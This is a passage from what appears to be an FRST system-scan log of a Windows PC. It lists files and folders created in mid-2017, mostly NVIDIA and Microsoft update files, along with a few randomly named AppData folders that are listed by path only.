____D C:\ProgramData\TEMP 2017-08-01 02:24 - 2017-08-01 02:24 - 000000214 _____ C:\WINDOWS\Tasks\CreateExplorerShellUnelevatedTask.job 2017-08-01 02:04 - 2017-08-01 03:19 - 000000000 ____D C:\Users\***\AppData\LocalLow\Mozilla 2017-08-01 02:04 - 2017-08-01 03:14 - 000000000 ____D C:\Users\***\AppData\Local\Mozilla 2017-08-01 01:54 - 2017-08-08 17:26 - 000002226 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk 2017-08-01 01:54 - 2017-08-08 17:26 - 000002214 _____ C:\Users\Public\Desktop\Google Chrome.lnk 2017-08-01 01:54 - 2017-08-01 01:54 - 000003628 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineUA 2017-08-01 01:54 - 2017-08-01 01:54 - 000003504 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineCore 2017-07-31 20:21 - 2017-07-31 20:21 - 000000000 ____D C:\Users\***\AppData\Local\PDF24 2017-07-28 19:41 - 2017-07-19 00:38 - 000135800 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvStreaming.exe 2017-07-28 19:41 - 2017-03-10 23:17 - 000536864 _____ C:\WINDOWS\system32\vulkan-1.dll 2017-07-28 19:41 - 2017-03-10 23:17 - 000525600 _____ 
C:\WINDOWS\SysWOW64\vulkan-1.dll 2017-07-28 19:41 - 2017-03-10 23:17 - 000254240 _____ C:\WINDOWS\system32\vulkaninfo.exe 2017-07-28 19:41 - 2017-03-10 23:17 - 000233760 _____ C:\WINDOWS\SysWOW64\vulkaninfo.exe 2017-07-28 19:39 - 2017-07-19 02:40 - 040239736 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvcompiler.dll 2017-07-28 19:39 - 2017-07-19 02:40 - 035844728 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvoglv64.dll 2017-07-28 19:39 - 2017-07-19 02:40 - 035314296 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvcompiler.dll 2017-07-28 19:39 - 2017-07-19 02:40 - 028960376 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvoglv32.dll 2017-07-28 19:39 - 2017-07-19 02:40 - 013655672 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvcuda.dll 2017-07-28 19:39 - 2017-07-19 02:40 - 012451424 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvopencl.dll 2017-07-28 19:39 - 2017-07-19 02:40 - 012133112 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvptxJitCompiler.dll 2017-07-28 19:39 - 2017-07-19 02:40 - 011591576 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvcuda.dll 2017-07-28 19:39 - 2017-07-19 02:40 - 010487760 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvopencl.dll 2017-07-28 19:39 - 2017-07-19 02:40 - 009982968 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvptxJitCompiler.dll 2017-07-28 19:39 - 2017-07-19 02:40 - 004210032 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvapi64.dll 2017-07-28 19:39 - 2017-07-19 02:40 - 004163520 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvcuvid.dll 2017-07-28 19:39 - 2017-07-19 02:40 - 003711328 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvapi.dll 2017-07-28 19:39 - 2017-07-19 02:40 - 003595896 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvcuvid.dll 2017-07-28 19:39 - 2017-07-19 02:40 - 001988216 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvdispco6438494.dll 2017-07-28 19:39 - 2017-07-19 02:40 - 001598072 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvdispgenco6438494.dll 2017-07-28 19:39 - 2017-07-19 
02:40 - 001278528 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvEncMFTH264.dll 2017-07-28 19:39 - 2017-07-19 02:40 - 001276992 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvEncMFThevc.dll 2017-07-28 19:39 - 2017-07-19 02:40 - 001068152 _____ (NVIDIA Corporation) C:\WINDOWS\system32\NvFBC64.dll 2017-07-28 19:39 - 2017-07-19 02:40 - 001004992 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\NvFBC.dll 2017-07-28 19:39 - 2017-07-19 02:40 - 000996760 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvEncMFTH264.dll 2017-07-28 19:39 - 2017-07-19 02:40 - 000995408 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvEncMFThevc.dll 2017-07-28 19:39 - 2017-07-19 02:40 - 000972920 _____ (NVIDIA Corporation) C:\WINDOWS\system32\NvIFR64.dll 2017-07-28 19:39 - 2017-07-19 02:40 - 000924280 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\NvIFR.dll 2017-07-28 19:39 - 2017-07-19 02:40 - 000781544 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvEncodeAPI64.dll 2017-07-28 19:39 - 2017-07-19 02:40 - 000725112 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvDecMFTMjpeg.dll 2017-07-28 19:39 - 2017-07-19 02:40 - 000689992 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvfatbinaryLoader.dll 2017-07-28 19:39 - 2017-07-19 02:40 - 000618744 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvmcumd.dll 2017-07-28 19:39 - 2017-07-19 02:40 - 000617416 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvEncodeAPI.dll 2017-07-28 19:39 - 2017-07-19 02:40 - 000609912 _____ (NVIDIA Corporation) C:\WINDOWS\system32\NvIFROpenGL.dll 2017-07-28 19:39 - 2017-07-19 02:40 - 000584312 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvDecMFTMjpeg.dll 2017-07-28 19:39 - 2017-07-19 02:40 - 000578056 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvfatbinaryLoader.dll 2017-07-28 19:39 - 2017-07-19 02:40 - 000499136 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\NvIFROpenGL.dll 2017-07-28 19:39 - 2017-07-19 02:40 - 000057792 _____ (NVIDIA Corporation) C:\WINDOWS\system32\Drivers\nvvhci.sys 2017-07-28 19:39 - 2017-07-19 
02:40 - 000046463 _____ C:\WINDOWS\system32\nvinfo.pb 2017-07-28 19:39 - 2017-07-19 02:40 - 000000669 _____ C:\WINDOWS\SysWOW64\nv-vk32.json 2017-07-28 19:39 - 2017-07-19 02:40 - 000000669 _____ C:\WINDOWS\system32\nv-vk64.json 2017-07-28 18:14 - 2017-07-28 18:14 - 000004308 _____ C:\WINDOWS\System32\Tasks\NvDriverUpdateCheckDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} 2017-07-28 18:14 - 2017-07-28 18:14 - 000004000 _____ C:\WINDOWS\System32\Tasks\NVIDIA GeForce Experience SelfUpdate_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} 2017-07-28 18:14 - 2017-07-28 18:14 - 000003994 _____ C:\WINDOWS\System32\Tasks\NvNodeLauncher_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} 2017-07-28 18:14 - 2017-07-26 19:09 - 001922496 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvspcap64.dll 2017-07-28 18:14 - 2017-07-26 19:09 - 001505728 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvspcap.dll 2017-07-28 18:13 - 2017-07-28 18:13 - 000003894 _____ C:\WINDOWS\System32\Tasks\NvProfileUpdaterDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} 2017-07-28 18:13 - 2017-07-28 18:13 - 000003866 _____ C:\WINDOWS\System32\Tasks\NvTmRep_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} 2017-07-28 18:13 - 2017-07-28 18:13 - 000003858 _____ C:\WINDOWS\System32\Tasks\NvTmMon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} 2017-07-28 18:13 - 2017-07-28 18:13 - 000003696 _____ C:\WINDOWS\System32\Tasks\NvTmRepOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} 2017-07-28 18:13 - 2017-07-28 18:13 - 000003654 _____ C:\WINDOWS\System32\Tasks\NvProfileUpdaterOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} 2017-07-28 18:13 - 2017-07-26 19:09 - 000048064 _____ (NVIDIA Corporation) C:\WINDOWS\system32\Drivers\nvvad64v.sys 2017-07-26 21:16 - 2017-08-01 04:05 - 000000000 ____D C:\Users\***\AppData\Local\Usidikujp 2017-07-26 21:16 - 2017-08-01 04:05 - 000000000 ____D C:\Users\***\AppData\Local\Rvurcez 2017-07-26 21:16 - 2017-07-26 21:16 - 000000000 ____D C:\Users\***\AppData\Local\Yhwopc 2017-07-26 21:16 - 2017-07-26 21:16 - 000000000 ____D 
C:\Users\***\AppData\Local\Wqy He 2017-07-26 21:16 - 2017-07-26 21:16 - 000000000 ____D C:\Users\***\AppData\Local\Bizpiwcinu 2017-07-26 21:16 - 2017-07-26 21:16 - 000000000 ____D C:\Users\***\AppData\Local\Bgew 2017-07-24 19:44 - 2017-07-26 19:09 - 000179136 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvaudcap64v.dll 2017-07-24 19:44 - 2017-07-26 19:09 - 000146368 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvaudcap32v.dll 2017-07-16 11:47 - 2017-07-16 11:47 - 001804696 _____ (Microsoft Corporation) C:\WINDOWS\system32\WdfCoInstaller01011.dll 2017-07-16 11:47 - 2017-07-16 11:47 - 000032840 _____ (ELAN Microelectronic Corp.) C:\WINDOWS\system32\Drivers\ETDSMBus.sys 2017-07-15 22:59 - 2017-07-15 22:59 - 000000000 ____D C:\Users\***\AppData\LocalLow\Thunder Lotus Games 2017-07-15 22:51 - 2017-07-15 22:51 - 000001418 _____ C:\Users\Public\Desktop\Darkest Dungeon.lnk 2017-07-11 20:54 - 2017-07-07 16:00 - 000947712 _____ (Microsoft Corporation) C:\WINDOWS\system32\HoloSI.PCShell.dll 2017-07-11 20:54 - 2017-07-07 09:24 - 000117664 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\pdc.sys 2017-07-11 20:54 - 2017-07-07 09:21 - 032688336 _____ (Microsoft Corporation) C:\WINDOWS\system32\WindowsCodecsRaw.dll 2017-07-11 20:54 - 2017-07-07 09:20 - 002021680 _____ (Microsoft Corporation) C:\WINDOWS\system32\wmpmde.dll 2017-07-11 20:54 - 2017-07-07 09:20 - 000519584 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\netio.sys 2017-07-11 20:54 - 2017-07-07 09:13 - 000336320 _____ (Microsoft Corporation) C:\WINDOWS\system32\SecurityHealthService.exe 2017-07-11 20:54 - 2017-07-07 09:11 - 000094624 _____ (Microsoft Corporation) C:\WINDOWS\system32\rdpudd.dll 2017-07-11 20:54 - 2017-07-07 09:10 - 001670496 _____ (Microsoft Corporation) C:\WINDOWS\system32\winmde.dll 2017-07-11 20:54 - 2017-07-07 09:10 - 000254168 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfps.dll 2017-07-11 20:54 - 2017-07-07 09:07 - 001106848 _____ (Microsoft Corporation) 
C:\WINDOWS\system32\Drivers\http.sys 2017-07-11 20:54 - 2017-07-07 09:07 - 000058488 _____ (Microsoft Corporation) C:\WINDOWS\system32\lsass.exe 2017-07-11 20:54 - 2017-07-07 08:57 - 000626528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\fontdrvhost.exe 2017-07-11 20:54 - 2017-07-07 08:57 - 000125344 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dwmapi.dll 2017-07-11 20:54 - 2017-07-07 08:37 - 031652264 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WindowsCodecsRaw.dll 2017-07-11 20:54 - 2017-07-07 08:37 - 001339352 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wmpmde.dll 2017-07-11 20:54 - 2017-07-07 08:31 - 001518088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WindowsCodecs.dll 2017-07-11 20:54 - 2017-07-07 08:31 - 000129184 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\gdi32.dll 2017-07-11 20:54 - 2017-07-07 08:30 - 000949920 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dcomp.dll 2017-07-11 20:54 - 2017-07-07 08:29 - 000123520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Clipc.dll 2017-07-11 20:54 - 2017-07-07 08:27 - 000557568 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieui.dll 2017-07-11 20:54 - 2017-07-07 08:26 - 001529384 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\winmde.dll 2017-07-11 20:54 - 2017-07-07 08:25 - 000035232 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wininitext.dll 2017-07-11 20:54 - 2017-07-07 08:20 - 000175616 _____ (Microsoft Corporation) C:\WINDOWS\system32\prntvpt.dll 2017-07-11 20:54 - 2017-07-07 08:19 - 007149056 _____ (Microsoft Corporation) C:\WINDOWS\system32\mos.dll 2017-07-11 20:54 - 2017-07-07 08:18 - 000548864 _____ (Microsoft Corporation) C:\WINDOWS\system32\SensorService.dll 2017-07-11 20:54 - 2017-07-07 08:17 - 000588800 _____ (Microsoft Corporation) C:\WINDOWS\system32\vbscript.dll 2017-07-11 20:54 - 2017-07-07 08:17 - 000422400 _____ (Microsoft Corporation) C:\WINDOWS\system32\WpAXHolder.dll 2017-07-11 20:54 - 2017-07-07 08:16 - 000545792 _____ (Microsoft Corporation) 
C:\WINDOWS\system32\winspool.drv 2017-07-11 20:54 - 2017-07-07 08:14 - 008211968 _____ (Microsoft Corporation) C:\WINDOWS\system32\mstscax.dll 2017-07-11 20:54 - 2017-07-07 08:14 - 003784704 _____ (Microsoft Corporation) C:\WINDOWS\system32\MapRouter.dll 2017-07-11 20:54 - 2017-07-07 08:14 - 001448960 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\GdiPlus.dll 2017-07-11 20:54 - 2017-07-07 08:14 - 000570880 _____ (Microsoft Corporation) C:\WINDOWS\system32\PhotoScreensaver.scr 2017-07-11 20:54 - 2017-07-07 08:12 - 001142272 _____ (Microsoft Corporation) C:\WINDOWS\system32\localspl.dll 2017-07-11 20:54 - 2017-07-07 08:12 - 000706560 _____ (Microsoft Corporation) C:\WINDOWS\system32\winlogon.exe 2017-07-11 20:54 - 2017-07-07 08:11 - 001812480 _____ (Microsoft Corporation) C:\WINDOWS\system32\msxml3.dll 2017-07-11 20:54 - 2017-07-07 08:10 - 000025088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\eapprovp.dll 2017-07-11 20:54 - 2017-07-07 08:09 - 000365056 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\daxexec.dll 2017-07-11 20:54 - 2017-07-07 08:08 - 000285696 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mrxsmb10.sys 2017-07-11 20:54 - 2017-07-07 08:07 - 000272896 _____ (Microsoft Corporation) C:\WINDOWS\system32\PlayToReceiver.dll 2017-07-11 20:54 - 2017-07-07 08:07 - 000117248 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\raschap.dll 2017-07-11 20:54 - 2017-07-07 08:06 - 000412160 _____ (Microsoft Corporation) C:\WINDOWS\system32\SensorsApi.dll 2017-07-11 20:54 - 2017-07-07 08:06 - 000241152 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WindowsCodecsExt.dll 2017-07-11 20:54 - 2017-07-07 08:06 - 000205824 _____ (Microsoft Corporation) C:\WINDOWS\system32\sensrsvc.dll 2017-07-11 20:54 - 2017-07-07 08:05 - 000502784 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\DevicePairing.dll 2017-07-11 20:54 - 2017-07-07 08:05 - 000312320 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Wldap32.dll 2017-07-11 20:54 - 2017-07-07 08:04 - 000754176 
_____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\kerberos.dll 2017-07-11 20:54 - 2017-07-07 08:04 - 000506368 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\vbscript.dll 2017-07-11 20:54 - 2017-07-07 08:03 - 006123520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mos.dll 2017-07-11 20:54 - 2017-07-07 08:02 - 000508416 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PhotoScreensaver.scr 2017-07-11 20:54 - 2017-07-07 08:01 - 002859520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wininet.dll 2017-07-11 20:54 - 2017-07-07 08:00 - 007596544 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mstscax.dll 2017-07-11 20:54 - 2017-07-07 08:00 - 002588160 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MapRouter.dll 2017-07-11 20:54 - 2017-07-07 08:00 - 001565184 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msxml3.dll 2017-07-11 20:54 - 2017-07-07 07:59 - 001494016 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ActiveSyncProvider.dll 2017-07-11 20:54 - 2017-07-07 07:59 - 001355264 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\OpcServices.dll 2017-07-11 20:54 - 2017-07-07 07:58 - 002782720 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msftedit.dll 2017-07-11 20:54 - 2017-07-07 07:58 - 002298368 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dwmcore.dll 2017-07-11 20:54 - 2017-07-07 07:58 - 001237504 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Xaml.Maps.dll 2017-07-11 20:54 - 2017-07-07 07:55 - 000342528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WMPhoto.dll 2017-07-11 20:54 - 2017-07-07 07:55 - 000329216 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SensorsApi.dll 2017-07-11 20:54 - 2017-07-07 07:53 - 001301504 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wdc.dll 2017-07-11 20:54 - 2017-07-07 07:53 - 000338432 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msinfo32.exe 2017-07-11 20:54 - 2017-06-20 08:11 - 000411992 _____ (Microsoft Corporation) C:\WINDOWS\system32\MSAudDecMFT.dll 2017-07-11 20:54 - 
2017-06-20 08:08 - 001242528 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ndis.sys 2017-07-11 20:54 - 2017-06-20 08:02 - 001055648 _____ (Microsoft Corporation) C:\WINDOWS\system32\LicenseManager.dll 2017-07-11 20:54 - 2017-06-20 07:59 - 001220072 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfsvr.dll 2017-07-11 20:54 - 2017-06-20 07:59 - 000467504 _____ (Microsoft Corporation) C:\WINDOWS\system32\MFCaptureEngine.dll 2017-07-11 20:54 - 2017-06-20 07:34 - 000192416 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\aepic.dll 2017-07-11 20:54 - 2017-06-20 07:15 - 000455104 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MSAudDecMFT.dll 2017-07-11 20:54 - 2017-06-20 07:13 - 000787712 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rpcrt4.dll 2017-07-11 20:54 - 2017-06-20 07:13 - 000056832 _____ (Microsoft Corporation) C:\WINDOWS\system32\WinBioDataModelOOBE.exe 2017-07-11 20:54 - 2017-06-20 07:12 - 000293376 _____ (Microsoft Corporation) C:\WINDOWS\system32\MusNotification.exe 2017-07-11 20:54 - 2017-06-20 07:12 - 000086528 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\hdaudbus.sys 2017-07-11 20:54 - 2017-06-20 07:11 - 000084992 _____ (Microsoft Corporation) C:\WINDOWS\system32\MshtmlDac.dll 2017-07-11 20:54 - 2017-06-20 07:10 - 000722432 _____ (Microsoft Corporation) C:\WINDOWS\system32\MusUpdateHandlers.dll 2017-07-11 20:54 - 2017-06-20 07:10 - 000096256 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtmled.dll 2017-07-11 20:54 - 2017-06-20 07:09 - 000551424 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Payments.dll 2017-07-11 20:54 - 2017-06-20 07:09 - 000357888 _____ (Microsoft Corporation) C:\WINDOWS\system32\Narrator.exe 2017-07-11 20:54 - 2017-06-20 07:09 - 000140288 _____ (Microsoft Corporation) C:\WINDOWS\system32\iepeers.dll 2017-07-11 20:54 - 2017-06-20 07:08 - 004469840 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\explorer.exe 2017-07-11 20:54 - 2017-06-20 07:08 - 000646656 _____ (Microsoft 
Corporation) C:\WINDOWS\system32\LockHostingFramework.dll 2017-07-11 20:54 - 2017-06-20 07:08 - 000386560 _____ (Microsoft Corporation) C:\WINDOWS\system32\iedkcs32.dll 2017-07-11 20:54 - 2017-06-20 07:08 - 000328704 _____ (Microsoft Corporation) C:\WINDOWS\system32\PsmServiceExtHost.dll 2017-07-11 20:54 - 2017-06-20 07:08 - 000327168 _____ (Microsoft Corporation) C:\WINDOWS\system32\WinBioDataModel.dll 2017-07-11 20:54 - 2017-06-20 07:08 - 000274944 _____ (Microsoft Corporation) C:\WINDOWS\system32\dxtrans.dll 2017-07-11 20:54 - 2017-06-20 07:07 - 002475136 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\d3d10warp.dll 2017-07-11 20:54 - 2017-06-20 07:07 - 000823296 _____ (Microsoft Corporation) C:\WINDOWS\system32\MbaeApi.dll 2017-07-11 20:54 - 2017-06-20 07:07 - 000632832 _____ (Microsoft Corporation) C:\WINDOWS\system32\tileobjserver.dll 2017-07-11 20:54 - 2017-06-20 07:07 - 000510976 _____ (Microsoft Corporation) C:\WINDOWS\system32\TDLMigration.dll 2017-07-11 20:54 - 2017-06-20 07:07 - 000346016 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CloudExperienceHostCommon.dll 2017-07-11 20:54 - 2017-06-20 07:07 - 000138656 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CloudExperienceHostUser.dll 2017-07-11 20:54 - 2017-06-20 07:06 - 000754592 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\LicenseManager.dll 2017-07-11 20:54 - 2017-06-20 07:06 - 000751104 _____ (Microsoft Corporation) C:\WINDOWS\system32\msfeeds.dll 2017-07-11 20:54 - 2017-06-20 07:06 - 000278944 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\thumbcache.dll 2017-07-11 20:54 - 2017-06-20 07:05 - 000438096 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.ApplicationModel.dll 2017-07-11 20:54 - 2017-06-20 07:05 - 000364032 _____ (Microsoft Corporation) C:\WINDOWS\system32\SearchProtocolHost.exe 2017-07-11 20:54 - 2017-06-20 07:04 - 002330520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\combase.dll 2017-07-11 20:54 - 2017-06-20 07:04 - 001178528 _____ (Microsoft Corporation) 
C:\WINDOWS\SysWOW64\AppxPackaging.dll 2017-07-11 20:54 - 2017-06-20 07:04 - 001177600 _____ (Microsoft Corporation) C:\WINDOWS\system32\Unistore.dll 2017-07-11 20:54 - 2017-06-20 07:04 - 001077496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\webservices.dll 2017-07-11 20:54 - 2017-06-20 07:04 - 000181656 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppxAllUserStore.dll 2017-07-11 20:54 - 2017-06-20 07:04 - 000049656 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msasn1.dll 2017-07-11 20:54 - 2017-06-20 07:03 - 002077184 _____ (Microsoft Corporation) C:\WINDOWS\system32\inetcpl.cpl 2017-07-11 20:54 - 2017-06-20 07:03 - 000443728 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MFCaptureEngine.dll 2017-07-11 20:54 - 2017-06-20 07:02 - 001121928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfsvr.dll 2017-07-11 20:54 - 2017-06-20 07:02 - 000354400 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MMDevAPI.dll 2017-07-11 20:54 - 2017-06-20 07:00 - 002597888 _____ (Microsoft Corporation) C:\WINDOWS\system32\mssrch.dll 2017-07-11 20:54 - 2017-06-20 06:59 - 001674240 _____ (Microsoft Corporation) C:\WINDOWS\system32\wpncore.dll 2017-07-11 20:54 - 2017-06-20 06:56 - 000985600 _____ (Microsoft Corporation) C:\WINDOWS\system32\TSWorkspace.dll 2017-07-11 20:54 - 2017-06-20 06:49 - 000899072 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msctfuimanager.dll 2017-07-11 20:54 - 2017-06-20 06:49 - 000331776 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\oleacc.dll 2017-07-11 20:54 - 2017-06-20 06:46 - 000132096 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Microsoft.Bluetooth.Profiles.Gatt.Interface.dll 2017-07-11 20:54 - 2017-06-20 06:45 - 000111104 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.System.Profile.RetailInfo.dll 2017-07-11 20:54 - 2017-06-20 06:45 - 000064000 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MshtmlDac.dll 2017-07-11 20:54 - 2017-06-20 06:43 - 000329728 _____ (Microsoft Corporation) 
C:\WINDOWS\SysWOW64\webplatstorageserver.dll 2017-07-11 20:54 - 2017-06-20 06:43 - 000173568 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ClipboardServer.dll 2017-07-11 20:54 - 2017-06-20 06:43 - 000151552 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wincredui.dll 2017-07-11 20:54 - 2017-06-20 06:43 - 000124928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iepeers.dll 2017-07-11 20:54 - 2017-06-20 06:43 - 000080384 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtmled.dll 2017-07-11 20:54 - 2017-06-20 06:43 - 000052224 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dataclen.dll 2017-07-11 20:54 - 2017-06-20 06:42 - 000641024 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\certca.dll 2017-07-11 20:54 - 2017-06-20 06:42 - 000387584 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Payments.dll 2017-07-11 20:54 - 2017-06-20 06:42 - 000338432 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iedkcs32.dll 2017-07-11 20:54 - 2017-06-20 06:42 - 000266240 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dxtrans.dll 2017-07-11 20:54 - 2017-06-20 06:42 - 000121856 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\sendmail.dll 2017-07-11 20:54 - 2017-06-20 06:41 - 000734208 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\bcastdvr.exe 2017-07-11 20:54 - 2017-06-20 06:41 - 000646656 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MbaeApi.dll 2017-07-11 20:54 - 2017-06-20 06:41 - 000601088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SndVolSSO.dll 2017-07-11 20:54 - 2017-06-20 06:41 - 000433152 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Internal.Bluetooth.dll 2017-07-11 20:54 - 2017-06-20 06:41 - 000201216 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\credprovhost.dll 2017-07-11 20:54 - 2017-06-20 06:40 - 000342016 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\certcli.dll 2017-07-11 20:54 - 2017-06-20 06:40 - 000247808 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AboveLockAppHost.dll 2017-07-11 20:54 - 
2017-06-20 06:40 - 000230912 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\edputil.dll 2017-07-11 20:54 - 2017-06-20 06:40 - 000038400 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TokenBrokerUI.dll 2017-07-11 20:54 - 2017-06-20 06:39 - 002814464 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\themeui.dll 2017-07-11 20:54 - 2017-06-20 06:39 - 000969728 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Unistore.dll 2017-07-11 20:54 - 2017-06-20 06:39 - 000646144 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mmsys.cpl 2017-07-11 20:54 - 2017-06-20 06:39 - 000471040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\VAN.dll 2017-07-11 20:54 - 2017-06-20 06:39 - 000312320 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SearchProtocolHost.exe 2017-07-11 20:54 - 2017-06-20 06:38 - 001451008 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UIAutomationCore.dll 2017-07-11 20:54 - 2017-06-20 06:38 - 001285120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dbghelp.dll 2017-07-11 20:54 - 2017-06-20 06:38 